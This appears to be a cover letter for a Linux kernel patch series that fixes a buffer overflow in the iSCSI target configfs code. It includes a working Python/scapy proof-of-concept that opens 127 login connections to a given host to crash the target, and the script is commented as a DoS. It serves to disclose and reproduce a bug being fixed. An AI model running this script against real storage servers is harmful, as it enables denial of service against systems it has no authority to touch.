This patch series cleanses iscsi_target_configfs.c of sprintf usage. The first patch fixes the real problem, the second just makes sure we are on the safe side from now on. I've reproduced the issue fixed in the first patch by utilizing this cool thing: https://git.sr.ht/~kshelekhin/scapy-iscsi Yeah, shameless promoting of my own tools, but I like the simplicity of scapy and writing tests in C with libiscsi can be a little cumbersome. Check it out: #!/usr/bin/env python3 # Let's cause some DoS in iSCSI target import sys from scapy.supersocket import StreamSocket from scapy_iscsi.iscsi import * cpr = { "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59", "TargetName": "iqn.2023-07.com.example:target", "HeaderDigest": "None", "DataDigest": "None", } spr = { "SessionType": "Normal", "ErrorRecoveryLevel": 0, "DefaultTime2Retain": 0, "DefaultTime2Wait": 2, "ImmediateData": "Yes", "FirstBurstLength": 65536, "MaxBurstLength": 262144, "MaxRecvDataSegmentLength": 262144, "MaxOutstandingR2T": 1, } if len(sys.argv) != 3: print("usage: dos.py <host> <port>", file=sys.stderr) exit(1) host = sys.argv[1] port = int(sys.argv[2]) isid = 0xB00B tsih = 0 connections = [] for i in range(0, 127): s = socket.socket() s.connect((host, port)) s = StreamSocket(s, ISCSI) ds = cpr if i > 0 else cpr | spr lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds)) lirs = s.sr1(lirq) tsih = lirs.tsih connections.append(s) input() Konstantin Shelekhin (2): scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c drivers/target/iscsi/iscsi_target_configfs.c | 72 ++++++++++---------- 1 file changed, 36 insertions(+), 36 deletions(-) -- 2.41.0
